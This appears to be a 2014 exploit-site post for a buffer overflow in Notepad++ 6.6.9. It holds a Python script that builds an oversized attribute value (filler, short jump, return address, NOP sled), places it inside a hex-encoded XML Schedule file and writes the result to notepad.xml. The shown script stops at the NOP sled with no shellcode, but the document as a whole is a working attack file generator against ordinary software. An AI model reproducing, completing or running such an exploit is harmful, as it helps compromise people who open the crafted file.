
NotePad++ 6.6.9 Buffer Overflow

Posted on 24 December 2014

```python
#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Risk: Medium
#
# Description:
# Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor
# and Notepad replacement that supports several languages.
# Running in the MS Windows environment, its use is governed by GPL License.
# Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses
# pure Win32 API and STL which ensures a higher execution speed and smaller program size.
# By optimizing as many routines as possible without losing user friendliness, Notepad++
# is trying to reduce the world carbon dioxide emissions. When using less CPU power, the
# PC can throttle down and reduce power consumption, resulting in a greener environment.
#
# Proof of Concept
# http://i.imgur.com/TTDtxJM.jpg
#
# Code
import struct


def little_endian(address):
    # Pack a 32-bit address as little-endian, as the x86 stack expects it.
    return struct.pack("<L", address)


# Oversized attribute value: filler, a short jump, the return address and a NOP pad,
# padded out to 20000 bytes in total.
poc = "\x41" * 591
poc += "\xeb\x06\x90\x90"
poc += little_endian(0x1004C31F)
poc += "\x90" * 80
poc += "\x90" * (20000 - len(poc))

# Hex-encoded XML prologue and opening <Schedule>/<Event ... Time="http:// element;
# the oversized value above is placed inside the Time attribute.
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
# Hex-encoded closing of the attribute and of the <Event/> and </Schedule> elements.
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"

exploit = header + footer

# Write the crafted file to disk.
filename = "notepad.xml"
file = open(filename, "w")
file.write(exploit)
file.close()
```
